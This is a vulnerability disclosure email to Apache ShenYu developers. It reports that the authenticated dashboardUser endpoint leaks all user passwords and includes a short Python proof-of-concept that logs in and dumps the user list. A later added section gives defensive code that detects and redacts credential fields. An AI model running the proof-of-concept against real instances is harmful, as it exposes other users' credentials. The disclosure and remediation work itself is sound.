Dear Developers of Apache Shenyu, I am reaching out to you as I was reviewing your application and there is a password leakage in the application.
It means that when a user requests the following URL "dashboardUser?currentPage=1&pageSize=12", the response will disclose all the passwords of the users. [image: image.png] It is not critical as you need to be authenticated but still it is a bad practice. I have attached a Python script to reproduce the issue. You need to set the information (host, username & password) to use it. Feel free to reach me should you have questions.
Regards,
Gregory
--
Grégory Draperi
import json
import requests

# Admin consoles are often served with self-signed certificates; silence the TLS warnings for the PoC
requests.packages.urllib3.disable_warnings()

if __name__ == '__main__':
    print("start")
    # Set these for the target instance (host, username & password)
    url = "http://127.0.0.1:9095"
    username = "admin"
    password = "123456"

    # Log in to the admin console and obtain the access token
    payload = {"userName": username, "password": password}
    r = requests.get(url + "/platform/login", params=payload)
    token = json.loads(r.text)['data']['token']
    print(token)

    # Authenticated request for the paginated user list; the response body discloses the passwords
    headers = {'X-Access-Token': token}
    r2 = requests.get(url + '/dashboardUser?currentPage=1&pageSize=12', headers=headers)
    print(r2.text)
    print("end")
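The script above only prints the raw response. The following is an added example, written for this page and not code from the reporter or from the Apache ShenYu project, that walks a JSON response and reports the paths of any credential-like fields, and shows the redaction a response DTO should apply before the object is serialised. The sample response body embedded below is constructed for the example; its field layout (data.dataList with userName/password entries) is an assumption, not ShenYu's actual schema, so point audit_response at a real captured body when checking an instance.

```python
from __future__ import annotations

import json
from typing import Any, Iterator

# Key-name fragments that should never appear in a user-list (or any list) response
SENSITIVE_KEYS = ("password", "passwd", "pwd", "secret")


def _is_sensitive(key: str) -> bool:
    return any(marker in key.lower() for marker in SENSITIVE_KEYS)


def sensitive_paths(obj: Any, path: str = "$") -> Iterator[tuple[str, Any]]:
    """Yield (json_path, value) for every key in a parsed JSON tree whose name looks like a credential."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            child = f"{path}.{key}"
            if _is_sensitive(key):
                yield child, value
            # Recurse so nested objects and lists (e.g. data.dataList[*]) are covered too
            yield from sensitive_paths(value, child)
    elif isinstance(obj, list):
        for idx, item in enumerate(obj):
            yield from sensitive_paths(item, f"{path}[{idx}]")


def audit_response(body: str) -> list[str]:
    """Return the JSON paths in an API response body that carry credential-like fields.

    An empty list means the body is clean with respect to SENSITIVE_KEYS.
    """
    return [path for path, _ in sensitive_paths(json.loads(body))]


def redact(obj: Any) -> Any:
    """Return a copy of obj with credential-like keys dropped at every nesting level.

    This is the behaviour a response DTO/serializer should have: the persisted entity
    may hold the password hash, but the object handed to the HTTP layer must not.
    """
    if isinstance(obj, dict):
        return {k: redact(v) for k, v in obj.items() if not _is_sensitive(k)}
    if isinstance(obj, list):
        return [redact(item) for item in obj]
    return obj


# Constructed sample of a paginated user-list response. The layout is an assumption
# made for this example and is not taken from ShenYu.
SAMPLE_RESPONSE = json.dumps({
    "code": 200,
    "message": "query success",
    "data": {
        "page": {"currentPage": 1, "pageSize": 12, "totalCount": 2},
        "dataList": [
            {"id": "1", "userName": "admin", "password": "123456", "role": 1, "enabled": True},
            {"id": "2", "userName": "alice", "password": "s3cret", "role": 0, "enabled": True},
        ],
    },
})


if __name__ == "__main__":
    leaks = audit_response(SAMPLE_RESPONSE)
    print("leaked fields:", leaks)
    cleaned = redact(json.loads(SAMPLE_RESPONSE))
    print("after redaction:", audit_response(json.dumps(cleaned)))
```

To use it against a live instance, feed the body returned by the authenticated /dashboardUser request (r2.text in the reporter's script) to audit_response; any non-empty result is the leak. The redact function illustrates the fix on the server side: drop the password from the object that is serialised, rather than relying on clients not to look at it.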